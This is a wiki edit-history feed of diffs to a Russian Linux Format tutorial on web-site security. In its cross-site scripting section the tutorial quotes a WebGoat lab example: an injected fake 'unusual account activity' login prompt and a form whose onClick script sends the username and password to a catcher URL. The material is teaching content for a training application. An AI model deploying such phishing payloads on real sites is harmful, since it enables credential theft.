<?xml version="1.0"?>
<?xml-stylesheet type="text/css" href="http://wiki.linuxformat.ru/wiki/skins/common/feed.css?303"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="ru">
		<id>http://wiki.linuxformat.ru/wiki/index.php?action=history&amp;feed=atom&amp;title=LXF159%3A%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC%3A_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8</id>
		<title>LXF159:Хакерам: Cайт в безопасности - История изменений</title>
		<link rel="self" type="application/atom+xml" href="http://wiki.linuxformat.ru/wiki/index.php?action=history&amp;feed=atom&amp;title=LXF159%3A%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC%3A_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8"/>
		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;action=history"/>
		<updated>2026-05-13T10:55:34Z</updated>
		<subtitle>История изменений этой страницы в вики</subtitle>
		<generator>MediaWiki 1.19.20+dfsg-0+deb7u3</generator>

	<entry>
		<id>http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18015&amp;oldid=prev</id>
		<title>Olkol: /* Меж­сай­то­вый скрип­тинг */</title>
		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18015&amp;oldid=prev"/>
				<updated>2018-09-25T22:51:00Z</updated>
		
		<summary type="html">&lt;p&gt;‎&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Меж­сай­то­вый скрип­тинг&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class='diff diff-contentalign-left'&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
			&lt;tr valign='top'&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Предыдущая&lt;/td&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Версия 22:51, 25 сентября 2018&lt;/td&gt;
			&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 120:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 120:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;#160; &amp;lt;pre&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;h1&amp;gt;Injected Text&amp;lt;/h1&amp;gt; &amp;lt;/pre&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;#160; &amp;lt;pre&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;h1&amp;gt;Injected Text&amp;lt;/h1&amp;gt; &amp;lt;/pre&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;br&amp;gt; – HTML-тэг пе­ре­хо­да на но­вую стро­ку, по­это­му наш текст по­яв­ля­ет­ся уже на но­вой стро­ке, а &amp;lt;h1&amp;gt;…&amp;lt;/h1&amp;gt; го­во­рит брау­зе­ру, что это за­го­ло­вок. С HTML мож­но до­бав­лять не толь­ко текст, но и фор­мы. Для вы­полнения этой ата­ки нам по­тре­бу­ет­ся и то, и дру­гое. Фор­ма бу­дет со­би­рать ин­фор­ма­цию о поль­зо­ва­те­ле, а скрипт раз­мес­тит ее на http://localhost/WebGoat/catcher?PROPERTY=yes&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;br&amp;gt; – HTML-тэг пе­ре­хо­да на но­вую стро­ку, по­это­му наш текст по­яв­ля­ет­ся уже на но­вой стро­ке, а &amp;#160;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;lt;pre&amp;gt;&lt;/ins&gt;&amp;lt;h1&amp;gt;…&amp;lt;/h1&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;gt; &amp;lt;/pre&lt;/ins&gt;&amp;gt;го­во­рит брау­зе­ру, что это за­го­ло­вок. С HTML мож­но до­бав­лять не толь­ко текст, но и фор­мы. Для вы­полнения этой ата­ки нам по­тре­бу­ет­ся и то, и дру­гое. Фор­ма бу­дет со­би­рать ин­фор­ма­цию о поль­зо­ва­те­ле, а скрипт раз­мес­тит ее на http://localhost/WebGoat/catcher?PROPERTY=yes&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Так как фи­шинг осно­ван на том, что­бы об­ман­ным пу­тем за­ста­вить поль­зо­ва­те­ля вве­сти свои дан­ные, нуж­но дать ему вес­кую при­чи­ну вой­ти на сайт. HTML-код на­шей фор­мы бу­дет та­ким:&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Так как фи­шинг осно­ван на том, что­бы об­ман­ным пу­тем за­ста­вить поль­зо­ва­те­ля вве­сти свои дан­ные, нуж­но дать ему вес­кую при­чи­ну вой­ти на сайт. HTML-код на­шей фор­мы бу­дет та­ким:&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Olkol</name></author>	</entry>

	<entry>
		<id>http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18014&amp;oldid=prev</id>
		<title>Olkol: /* Меж­сай­то­вый скрип­тинг */</title>
		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18014&amp;oldid=prev"/>
				<updated>2018-09-25T22:49:28Z</updated>
		
		<summary type="html">&lt;p&gt;‎&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Меж­сай­то­вый скрип­тинг&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class='diff diff-contentalign-left'&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
			&lt;tr valign='top'&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Предыдущая&lt;/td&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Версия 22:49, 25 сентября 2018&lt;/td&gt;
			&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 124:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 124:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Так как фи­шинг осно­ван на том, что­бы об­ман­ным пу­тем за­ста­вить поль­зо­ва­те­ля вве­сти свои дан­ные, нуж­но дать ему вес­кую при­чи­ну вой­ти на сайт. HTML-код на­шей фор­мы бу­дет та­ким:&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Так как фи­шинг осно­ван на том, что­бы об­ман­ным пу­тем за­ста­вить поль­зо­ва­те­ля вве­сти свои дан­ные, нуж­но дать ему вес­кую при­чи­ну вой­ти на сайт. HTML-код на­шей фор­мы бу­дет та­ким:&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;h1&amp;gt;Важ­но: На­ши сер­ве­ры об­на­ру­жи­ли не­обыч­ную ак­тив­ность ва­шей учет­ной за­пи­си. По­жа­луй­ста, не­мед­лен­но&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;lt;pre&amp;gt; &lt;/ins&gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;h1&amp;gt;Важ­но: На­ши сер­ве­ры об­на­ру­жи­ли не­обыч­ную ак­тив­ность ва­шей учет­ной за­пи­си. По­жа­луй­ста, не­мед­лен­но&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;зай­ди­те, что­бы пре­сечь не­ав­то­ри­зо­ван­ные дей­ст­вия&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;зай­ди­те, что­бы пре­сечь не­ав­то­ри­зо­ван­ные дей­ст­вия&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 132:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 132:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;name=”login” onClick=”var image1=new Image; image1.src=’http://localhost:8080/webgoat/catcher?PROPERTY=yes&amp;amp;user=’+this.form.user.value+’&amp;amp;password=’+this.form.pass.value;”&amp;gt;&amp;lt;/form&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;name=”login” onClick=”var image1=new Image; image1.src=’http://localhost:8080/webgoat/catcher?PROPERTY=yes&amp;amp;user=’+this.form.user.value+’&amp;amp;password=’+this.form.pass.value;”&amp;gt;&amp;lt;/form&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;color: red; font-weight: bold; text-decoration: none;&quot;&gt;&amp;lt;/pre&amp;gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Эта фор­ма со­бе­рет ло­гин и па­роль поль­зо­ва­те­ля и пе­ре­даст их на сер­вер. Мораль: при об­ра­бот­ке вво­ди­мых поль­зо­ва­те­лем дан­ных, ко­то­рые бу­дут ото­бра­жать­ся на сай­те, про­ве­ряйте их на на­ли­чие &amp;lt; и &amp;gt;, так как с их по­мо­щью мож­но соз­дать HTML-тэ­ги.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Эта фор­ма со­бе­рет ло­гин и па­роль поль­зо­ва­те­ля и пе­ре­даст их на сер­вер. Мораль: при об­ра­бот­ке вво­ди­мых поль­зо­ва­те­лем дан­ных, ко­то­рые бу­дут ото­бра­жать­ся на сай­те, про­ве­ряйте их на на­ли­чие &amp;lt; и &amp;gt;, так как с их по­мо­щью мож­но соз­дать HTML-тэ­ги.&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Olkol</name></author>	</entry>

	<entry>
		<id>http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18013&amp;oldid=prev</id>
		<title>Olkol: /* Меж­сай­то­вый скрип­тинг */</title>
		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18013&amp;oldid=prev"/>
				<updated>2018-09-25T22:45:09Z</updated>
		
		<summary type="html">&lt;p&gt;‎&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Меж­сай­то­вый скрип­тинг&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class='diff diff-contentalign-left'&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
			&lt;tr valign='top'&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Предыдущая&lt;/td&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Версия 22:45, 25 сентября 2018&lt;/td&gt;
			&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 118:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 118:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Это зна­чит, что по­сле Results for: мож­но вста­вить что угод­но, и с неболь­ши­ми знания­ми HTML мы мо­жем до­ба­вить не толь­ко обыч­ный текст. На­при­мер, вве­ди­те по­ис­ко­вый за­прос:&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Это зна­чит, что по­сле Results for: мож­но вста­вить что угод­но, и с неболь­ши­ми знания­ми HTML мы мо­жем до­ба­вить не толь­ко обыч­ный текст. На­при­мер, вве­ди­те по­ис­ко­вый за­прос:&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;#160; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;h1&amp;gt;Injected Text&amp;lt;/h1&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;#160; &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;lt;pre&amp;gt;&lt;/ins&gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;h1&amp;gt;Injected Text&amp;lt;/h1&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;gt; &amp;lt;/pre&lt;/ins&gt;&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;br&amp;gt; – HTML-тэг пе­ре­хо­да на но­вую стро­ку, по­это­му наш текст по­яв­ля­ет­ся уже на но­вой стро­ке, а &amp;lt;h1&amp;gt;…&amp;lt;/h1&amp;gt; го­во­рит брау­зе­ру, что это за­го­ло­вок. С HTML мож­но до­бав­лять не толь­ко текст, но и фор­мы. Для вы­полнения этой ата­ки нам по­тре­бу­ет­ся и то, и дру­гое. Фор­ма бу­дет со­би­рать ин­фор­ма­цию о поль­зо­ва­те­ле, а скрипт раз­мес­тит ее на http://localhost/WebGoat/catcher?PROPERTY=yes&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;br&amp;gt; – HTML-тэг пе­ре­хо­да на но­вую стро­ку, по­это­му наш текст по­яв­ля­ет­ся уже на но­вой стро­ке, а &amp;lt;h1&amp;gt;…&amp;lt;/h1&amp;gt; го­во­рит брау­зе­ру, что это за­го­ло­вок. С HTML мож­но до­бав­лять не толь­ко текст, но и фор­мы. Для вы­полнения этой ата­ки нам по­тре­бу­ет­ся и то, и дру­гое. Фор­ма бу­дет со­би­рать ин­фор­ма­цию о поль­зо­ва­те­ле, а скрипт раз­мес­тит ее на http://localhost/WebGoat/catcher?PROPERTY=yes&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Olkol</name></author>	</entry>

	<entry>
		<id>http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18012&amp;oldid=prev</id>
		<title>Olkol: /* Меж­сай­то­вый скрип­тинг */</title>
		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18012&amp;oldid=prev"/>
				<updated>2018-09-25T22:44:21Z</updated>
		
		<summary type="html">&lt;p&gt;‎&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Меж­сай­то­вый скрип­тинг&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class='diff diff-contentalign-left'&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
			&lt;tr valign='top'&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Предыдущая&lt;/td&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Версия 22:44, 25 сентября 2018&lt;/td&gt;
			&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 118:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 118:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Это зна­чит, что по­сле Results for: мож­но вста­вить что угод­но, и с неболь­ши­ми знания­ми HTML мы мо­жем до­ба­вить не толь­ко обыч­ный текст. На­при­мер, вве­ди­те по­ис­ко­вый за­прос:&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;Это зна­чит, что по­сле Results for: мож­но вста­вить что угод­но, и с неболь­ши­ми знания­ми HTML мы мо­жем до­ба­вить не толь­ко обыч­ный текст. На­при­мер, вве­ди­те по­ис­ко­вый за­прос:&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;background: #ffa; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;h1&amp;gt;Injected Text&amp;lt;/h1&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; &lt;/ins&gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;h1&amp;gt;Injected Text&amp;lt;/h1&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;br&amp;gt; – HTML-тэг пе­ре­хо­да на но­вую стро­ку, по­это­му наш текст по­яв­ля­ет­ся уже на но­вой стро­ке, а &amp;lt;h1&amp;gt;…&amp;lt;/h1&amp;gt; го­во­рит брау­зе­ру, что это за­го­ло­вок. С HTML мож­но до­бав­лять не толь­ко текст, но и фор­мы. Для вы­полнения этой ата­ки нам по­тре­бу­ет­ся и то, и дру­гое. Фор­ма бу­дет со­би­рать ин­фор­ма­цию о поль­зо­ва­те­ле, а скрипт раз­мес­тит ее на http://localhost/WebGoat/catcher?PROPERTY=yes&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&amp;lt;br&amp;gt; – HTML-тэг пе­ре­хо­да на но­вую стро­ку, по­это­му наш текст по­яв­ля­ет­ся уже на но­вой стро­ке, а &amp;lt;h1&amp;gt;…&amp;lt;/h1&amp;gt; го­во­рит брау­зе­ру, что это за­го­ло­вок. С HTML мож­но до­бав­лять не толь­ко текст, но и фор­мы. Для вы­полнения этой ата­ки нам по­тре­бу­ет­ся и то, и дру­гое. Фор­ма бу­дет со­би­рать ин­фор­ма­цию о поль­зо­ва­те­ле, а скрипт раз­мес­тит ее на http://localhost/WebGoat/catcher?PROPERTY=yes&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Olkol</name></author>	</entry>

	<entry>
		<id>http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18010&amp;oldid=prev</id>
		<title>Olkol: /* Ха­ке­рам: Cайт в безо­пас­но­сти */</title>
